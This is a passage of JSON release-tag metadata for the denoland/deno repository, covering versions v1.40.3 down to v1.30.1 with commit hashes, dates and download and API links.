40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98